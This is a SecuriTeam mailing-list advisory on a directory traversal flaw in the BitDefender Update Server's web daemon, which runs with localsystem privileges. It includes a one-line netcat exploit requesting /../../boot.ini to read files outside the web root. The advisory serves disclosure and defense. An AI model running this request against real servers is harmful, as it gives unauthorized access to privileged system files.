[NT] BitDefender Update Server Unauthorized File Access Vulnerability



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



BitDefender Update Server Unauthorized File Access Vulnerability
------------------------------------------------------------------------


SUMMARY

"BitDefenderT provides security solutions to satisfy the protection
requirements of today's computing environment, delivering effective threat
management for over 41 million home and corporate users in more than 100
countries. BitDefender, a division of SOFTWIN, is headquartered in
Bucharest, Romania and has offices in Tettnang, Germany, Barcelona, Spain
and Fort Lauderdale (FL), USA.

....The Update Server allows you to set up an upgrade location within
your local network. This way you needn't worry about updating the products
installed on computers that are not connected to the Internet, achieving,
at the same time, faster updates and reduced Internet traffic. The
BitDefender Update Server is easy to configure through an intuitive step
by step wizard. It will help you get the latest updates for all
BitDefender products."

The Update Server, which is part of several of BitDefender's Enterprise
products, is running an Http-Daemon. The http.exe process is running with
localsystem privileges and is vulnerable to the plain old directory
traversal vulnerability. Thus it is possible to access files outside of
the applications root directory with the named privileges.

DETAILS

Vulnerable Systems:
* BitDefender Security for Fileservers
* BitDefender Enterprise Manager (BDEM)

Exploit:
To exploit simply do an

echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc <server> <port>


ADDITIONAL INFORMATION

The information has been provided by <mailto:oliver.karow@xxxxxx> Oliver
Karow.
The original article can be found at:
<http://oliver.greyhat.de/2008/01/19/bitdefender-unauthorized-remote-file-access-vulnerability/> http://oliver.greyhat.de/2008/01/19/bitdefender-unauthorized-remote-file-access-vulnerability/



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: Antivirus
    ... >> BitDefender, free, at ... > Speaking of security ... ... software field. ...
    (comp.os.linux.security)
  • Re: WIN XP: Dauernder Neustart nach Update
    ... Security 2007" liegen? ... (Microsoft und Bitdefender) ... Hermann ...
    (microsoft.public.de.german.windowsxp.sonstiges)
  • SecurityFocus Microsoft Newsletter #165
    ... Tenable Security ... distribute, manage, and communicate vulnerability and intrusion detection ... Microsoft Internet Explorer MHTML Forced File Execution Vuln... ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #174
    ... This issue sponsored by: Tenable Network Security ... the worlds only 100% passive vulnerability ... MICROSOFT VULNERABILITY SUMMARY ... Novell Netware Enterprise Web Server Multiple Vulnerabilitie... ...
    (Focus-Microsoft)
  • [NT] Cumulative Security Update for Internet Explorer (MS04-038)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... CSS Heap Memory Corruption Vulnerability, ... Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 ...
    (Securiteam)